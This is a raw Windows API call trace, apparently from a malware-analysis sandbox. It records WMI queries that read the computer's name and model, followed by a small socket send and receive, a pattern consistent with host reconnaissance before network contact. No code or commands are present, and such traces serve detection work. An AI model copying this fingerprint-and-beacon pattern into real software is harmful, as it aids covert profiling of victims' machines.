	[0262.465] IWbemClassObject:Get (in: This=0x6272150, wszName="__RELPATH", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe6f90*=0, plFlavor=0x2fe6f94*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x2fe6f90*=8, plFlavor=0x2fe6f94*=64) returned 0x0
	[0262.465] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0262.466] IWbemClassObject:Get (in: This=0x6272150, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe7014*=0, plFlavor=0x2fe7018*=0 | out: pVal=0x5eae914*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x2fe7014*=3, plFlavor=0x2fe7018*=64) returned 0x0
	[0262.466] IWbemClassObject:Get (in: This=0x6272150, wszName="__DERIVATION", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe7048*=0, plFlavor=0x2fe704c*=0 | out: pVal=0x5eae914*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3acd60*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x3bd408, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x2fe7048*=8200, plFlavor=0x2fe704c*=64) returned 0x0
	[0262.466] IWbemClassObject:Get (in: This=0x6272150, wszName="__SERVER", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe7080*=0, plFlavor=0x2fe7084*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x2fe7080*=8, plFlavor=0x2fe7084*=64) returned 0x0
	[0262.466] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0262.467] IWbemClassObject:Get (in: This=0x6272150, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe70cc*=0, plFlavor=0x2fe70d0*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x2fe70cc*=8, plFlavor=0x2fe70d0*=64) returned 0x0
	[0262.467] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0262.467] IWbemClassObject:Get (in: This=0x6272150, wszName="__PATH", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe711c*=0, plFlavor=0x2fe7120*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x2fe711c*=8, plFlavor=0x2fe7120*=64) returned 0x0
	[0262.467] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0262.467] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x626de40, puCount=0x5eae994 | out: puCount=0x5eae994*=0x2) returned 0x0
	[0262.467] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae990*=0x0, pszText=0x0 | out: puBuffLength=0x5eae990*=0x17, pszText=0x0) returned 0x0
	[0262.467] WbemDefPath:IWbemPath:GetText (in: This=0x626de40, lFlags=4, puBuffLength=0x5eae990*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae990*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.467] IWbemClassObject:Get (in: This=0x6272150, wszName="Model", lFlags=0, pVal=0x5eae950*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe7220*=0, plFlavor=0x2fe7224*=0 | out: pVal=0x5eae950*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x2fe7220*=8, plFlavor=0x2fe7224*=32) returned 0x0
	[0262.467] SysStringLen (param_1="M5X0JE") returned 0x6
	[0262.468] IWbemClassObject:Get (in: This=0x6272150, wszName="Model", lFlags=0, pVal=0x5eaea08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2fe7220*=8, plFlavor=0x2fe7224*=32 | out: pVal=0x5eaea08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x2fe7220*=8, plFlavor=0x2fe7224*=32) returned 0x0
	[0262.468] SysStringLen (param_1="M5X0JE") returned 0x6
	[0262.468] send (s=0x420, buf=0x2fe8114*, len=26, flags=0) returned 26
	[0262.469] GetLastError () returned 0x0
	[0262.469] recv (in: s=0x420, buf=0x2fa0ffc, len=502, flags=0 | out: buf=0x2fa0ffc*) returned 136
	[0263.203] GetLastError () returned 0x0
	[0263.205] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0263.206] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae8dc | out: ppv=0x5eae8dc*=0x2d8dec) returned 0x0
	[0263.206] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae8d4 | out: pAptType=0x5eae8d4*=1) returned 0x0
	[0263.207] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae8d8 | out: ppvObject=0x5eae8d8*=0x0) returned 0x80004002
	[0263.207] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0263.207] CoGetClassObject (in: rclsid=0x38bb74*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae3f4 | out: ppv=0x5eae3f4*=0x6271f58) returned 0x0
	[0263.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x6271f58, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae224 | out: ppvObject=0x5eae224*=0x0) returned 0x80004002
	[0263.207] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6271f58, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae25c | out: ppvObject=0x5eae25c*=0x6272088) returned 0x0
	[0263.208] WbemDefPath:IUnknown:QueryInterface (in: This=0x6272088, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae000 | out: ppvObject=0x5eae000*=0x6272088) returned 0x0
	[0263.208] WbemDefPath:IUnknown:QueryInterface (in: This=0x6272088, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadfbc | out: ppvObject=0x5eadfbc*=0x0) returned 0x80004002
	[0263.208] WbemDefPath:IUnknown:AddRef (This=0x6272088) returned 0x3
	[0263.208] CoGetContextToken (in: pToken=0x5eade48 | out: pToken=0x5eade48) returned 0x0
	[0263.208] WbemDefPath:IUnknown:QueryInterface (in: This=0x6272088, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade30 | out: ppvObject=0x5eade30*=0x3bd408) returned 0x0
	[0263.209] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x3bd408, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eade38 | out: pCid=0x5eade38*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.209] WbemDefPath:IUnknown:Release (This=0x3bd408) returned 0x3
	[0263.209] CoGetContextToken (in: pToken=0x5eade40 | out: pToken=0x5eade40) returned 0x0
	[0263.209] WbemDefPath:IUnknown:AddRef (This=0x6272088) returned 0x4
	[0263.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x6272088, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadeb4 | out: ppvObject=0x5eadeb4*=0x0) returned 0x80004002
	[0263.209] WbemDefPath:IUnknown:Release (This=0x6272088) returned 0x3
	[0263.209] WbemDefPath:IUnknown:Release (This=0x6272088) returned 0x2
	[0263.209] WbemDefPath:IUnknown:Release (This=0x6271f58) returned 0x0
	[0263.210] WbemDefPath:IUnknown:Release (This=0x6272088) returned 0x1
	[0263.210] CoGetContextToken (in: pToken=0x5eae6f0 | out: pToken=0x5eae6f0) returned 0x0
	[0263.210] CoGetContextToken (in: pToken=0x5eae6b0 | out: pToken=0x5eae6b0) returned 0x0
	[0263.210] WbemDefPath:IUnknown:AddRef (This=0x6272088) returned 0x2
	[0263.210] WbemDefPath:IUnknown:QueryInterface (in: This=0x6272088, riid=0x5eae72c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae728 | out: ppvObject=0x5eae728*=0x6272088) returned 0x0
	[0263.210] WbemDefPath:IUnknown:Release (This=0x6272088) returned 0x2
	[0263.210] WbemDefPath:IUnknown:Release (This=0x6272088) returned 0x1
	[0263.210] CoGetContextToken (in: pToken=0x5eae770 | out: pToken=0x5eae770) returned 0x0
	[0263.210] CoGetContextToken (in: pToken=0x5eae730 | out: pToken=0x5eae730) returned 0x0
	[0263.210] WbemDefPath:IUnknown:AddRef (This=0x6272088) returned 0x2
	[0263.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x6272088, riid=0x5eae7ac*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae7a8 | out: ppvObject=0x5eae7a8*=0x6272088) returned 0x0
	[0263.211] WbemDefPath:IUnknown:Release (This=0x6272088) returned 0x2
	[0263.211] WbemDefPath:IUnknown:AddRef (This=0x6272088) returned 0x3
	[0263.211] WbemDefPath:IWbemPath:SetText (This=0x6272088, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.211] WbemDefPath:IUnknown:Release (This=0x6272088) returned 0x2
	[0263.211] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6272088, puCount=0x5eae914 | out: puCount=0x5eae914*=0x2) returned 0x0
	[0263.211] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae910*=0x0, pszText=0x0 | out: puBuffLength=0x5eae910*=0x17, pszText=0x0) returned 0x0
	[0263.211] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae910*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae910*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.211] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6272088, puCount=0x5eae910 | out: puCount=0x5eae910*=0x2) returned 0x0
	[0263.211] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae90c*=0x0, pszText=0x0 | out: puBuffLength=0x5eae90c*=0x17, pszText=0x0) returned 0x0
	[0263.211] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae90c*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae90c*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.211] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae88c | out: ppv=0x5eae88c*=0x2d8dec) returned 0x0
	[0263.212] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae884 | out: pAptType=0x5eae884*=1) returned 0x0
	[0263.212] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae888 | out: ppvObject=0x5eae888*=0x0) returned 0x80004002
	[0263.212] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0263.212] CoGetClassObject (in: rclsid=0x382364*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae6dc | out: ppv=0x5eae6dc*=0x626dbd8) returned 0x0
	[0263.212] WbemLocator:IUnknown:QueryInterface (in: This=0x626dbd8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae50c | out: ppvObject=0x5eae50c*=0x0) returned 0x80004002
	[0263.212] WbemLocator:IClassFactory:CreateInstance (in: This=0x626dbd8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae544 | out: ppvObject=0x5eae544*=0x6271f58) returned 0x0
	[0263.213] WbemLocator:IUnknown:QueryInterface (in: This=0x6271f58, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2e8 | out: ppvObject=0x5eae2e8*=0x6271f58) returned 0x0
	[0263.213] WbemLocator:IUnknown:QueryInterface (in: This=0x6271f58, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eae2a4 | out: ppvObject=0x5eae2a4*=0x0) returned 0x80004002
	[0263.213] WbemLocator:IUnknown:AddRef (This=0x6271f58) returned 0x3
	[0263.213] CoGetContextToken (in: pToken=0x5eae130 | out: pToken=0x5eae130) returned 0x0
	[0263.213] WbemLocator:IUnknown:QueryInterface (in: This=0x6271f58, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae118 | out: ppvObject=0x5eae118*=0x0) returned 0x80004002
	[0263.214] CoGetContextToken (in: pToken=0x5eae128 | out: pToken=0x5eae128) returned 0x0
	[0263.214] WbemLocator:IUnknown:AddRef (This=0x6271f58) returned 0x4
	[0263.214] WbemLocator:IUnknown:QueryInterface (in: This=0x6271f58, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae19c | out: ppvObject=0x5eae19c*=0x0) returned 0x80004002
	[0263.214] WbemLocator:IUnknown:Release (This=0x6271f58) returned 0x3
	[0263.214] WbemLocator:IUnknown:Release (This=0x6271f58) returned 0x2
	[0263.214] WbemLocator:IUnknown:Release (This=0x626dbd8) returned 0x0
	[0263.214] WbemLocator:IUnknown:Release (This=0x6271f58) returned 0x1
	[0263.214] CoGetContextToken (in: pToken=0x5eae634 | out: pToken=0x5eae634) returned 0x0
	[0263.215] CoGetContextToken (in: pToken=0x5eae5f4 | out: pToken=0x5eae5f4) returned 0x0
	[0263.215] WbemLocator:IUnknown:AddRef (This=0x6271f58) returned 0x2
	[0263.215] WbemLocator:IUnknown:QueryInterface (in: This=0x6271f58, riid=0x5eae670*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5eae66c | out: ppvObject=0x5eae66c*=0x6271f58) returned 0x0
	[0263.215] WbemLocator:IUnknown:Release (This=0x6271f58) returned 0x2
	[0263.215] WbemLocator:IUnknown:Release (This=0x6271f58) returned 0x1
	[0263.215] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6272088, puCount=0x5eae864 | out: puCount=0x5eae864*=0x2) returned 0x0
	[0263.215] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=8, puBuffLength=0x5eae860*=0x0, pszText=0x0 | out: puBuffLength=0x5eae860*=0x17, pszText=0x0) returned 0x0
	[0263.215] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=8, puBuffLength=0x5eae860*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae860*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.215] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5eae33c | out: ppv=0x5eae33c*=0x626dee8) returned 0x0
	[0263.215] WbemLocator:IWbemLocator:ConnectServer (in: This=0x626dee8, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5eae388 | out: ppNamespace=0x5eae388*=0x627213c) returned 0x0
	[0263.336] WbemLocator:IUnknown:QueryInterface (in: This=0x627213c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae258 | out: ppvObject=0x5eae258*=0x3ba29c) returned 0x0
	[0263.337] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x3ba29c, pProxy=0x627213c, pAuthnSvc=0x5eae2a0, pAuthzSvc=0x5eae29c, pServerPrincName=0x5eae2ac, pAuthnLevel=0x5eae2a4, pImpLevel=0x5eae290, pAuthInfo=0x5eae294, pCapabilites=0x5eae298 | out: pAuthnSvc=0x5eae2a0*=0xa, pAuthzSvc=0x5eae29c*=0x0, pServerPrincName=0x5eae2ac, pAuthnLevel=0x5eae2a4*=0x6, pImpLevel=0x5eae290*=0x2, pAuthInfo=0x5eae294, pCapabilites=0x5eae298*=0x1) returned 0x0
	[0263.337] WbemLocator:IUnknown:Release (This=0x3ba29c) returned 0x1
	[0263.337] WbemLocator:IUnknown:QueryInterface (in: This=0x627213c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae24c | out: ppvObject=0x5eae24c*=0x3ba2bc) returned 0x0
	[0263.337] WbemLocator:IUnknown:QueryInterface (in: This=0x627213c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae248 | out: ppvObject=0x5eae248*=0x3ba29c) returned 0x0
	[0263.337] WbemLocator:IClientSecurity:SetBlanket (This=0x3ba29c, pProxy=0x627213c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0263.337] WbemLocator:IUnknown:Release (This=0x3ba29c) returned 0x2
	[0263.337] WbemLocator:IUnknown:Release (This=0x3ba2bc) returned 0x1
	[0263.337] CoTaskMemFree (pv=0x3acdb0) 
	[0263.338] WbemLocator:IUnknown:Release (This=0x626dee8) returned 0x0
	[0263.338] WbemLocator:IUnknown:QueryInterface (in: This=0x627213c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadc08 | out: ppvObject=0x5eadc08*=0x3ba2bc) returned 0x0
	[0263.338] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba2bc, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadbc4 | out: ppvObject=0x5eadbc4*=0x0) returned 0x80004002
	[0263.340] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba2bc, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eadab8 | out: ppvObject=0x5eadab8*=0x0) returned 0x80004002
	[0263.342] WbemLocator:IUnknown:AddRef (This=0x3ba2bc) returned 0x3
	[0263.342] CoGetContextToken (in: pToken=0x5eada50 | out: pToken=0x5eada50) returned 0x0
	[0263.342] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba2bc, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eada38 | out: ppvObject=0x5eada38*=0x3ba21c) returned 0x0
	[0263.342] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x3ba21c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eada40 | out: pCid=0x5eada40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.342] WbemLocator:IUnknown:Release (This=0x3ba21c) returned 0x3
	[0263.342] CoGetContextToken (in: pToken=0x5eada48 | out: pToken=0x5eada48) returned 0x0
	[0263.342] WbemLocator:IUnknown:AddRef (This=0x3ba2bc) returned 0x4
	[0263.342] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba2bc, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadabc | out: ppvObject=0x5eadabc*=0x3ba2a4) returned 0x0
	[0263.343] WbemLocator:IUnknown:Release (This=0x3ba2bc) returned 0x4
	[0263.343] WbemLocator:IRpcOptions:Query (in: This=0x3ba2a4, pPrx=0x3ba2bc, dwProperty=2, pdwValue=0x5eadae0 | out: pdwValue=0x5eadae0) returned 0x80004002
	[0263.343] WbemLocator:IUnknown:Release (This=0x3ba2a4) returned 0x3
	[0263.343] WbemLocator:IUnknown:Release (This=0x3ba2bc) returned 0x2
	[0263.343] CoGetContextToken (in: pToken=0x5eadebc | out: pToken=0x5eadebc) returned 0x0
	[0263.343] CoGetContextToken (in: pToken=0x5eade7c | out: pToken=0x5eade7c) returned 0x0
	[0263.343] WbemLocator:IUnknown:AddRef (This=0x3ba2bc) returned 0x3
	[0263.343] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba2bc, riid=0x5eadef8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5eadef4 | out: ppvObject=0x5eadef4*=0x627213c) returned 0x0
	[0263.343] WbemLocator:IUnknown:Release (This=0x3ba2bc) returned 0x3
	[0263.344] WbemLocator:IUnknown:Release (This=0x627213c) returned 0x2
	[0263.344] WbemLocator:IUnknown:Release (This=0x627213c) returned 0x1
	[0263.344] CoGetContextToken (in: pToken=0x5eae7d8 | out: pToken=0x5eae7d8) returned 0x0
	[0263.344] WbemLocator:IUnknown:AddRef (This=0x3ba2bc) returned 0x2
	[0263.344] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba2bc, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae3fc | out: ppvObject=0x5eae3fc*=0x3ba2bc) returned 0x0
	[0263.344] WbemLocator:IUnknown:Release (This=0x3ba2bc) returned 0x2
	[0263.344] WbemLocator:IUnknown:Release (This=0x3ba2bc) returned 0x1
	[0263.344] CoGetContextToken (in: pToken=0x5eadfdc | out: pToken=0x5eadfdc) returned 0x0
	[0263.345] CoGetContextToken (in: pToken=0x5eadf9c | out: pToken=0x5eadf9c) returned 0x0
	[0263.345] WbemLocator:IUnknown:AddRef (This=0x3ba2bc) returned 0x2
	[0263.345] WbemLocator:IUnknown:QueryInterface (in: This=0x3ba2bc, riid=0x5eae018*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x5eae014 | out: ppvObject=0x5eae014*=0x627213c) returned 0x0
	[0263.345] WbemLocator:IUnknown:Release (This=0x3ba2bc) returned 0x2
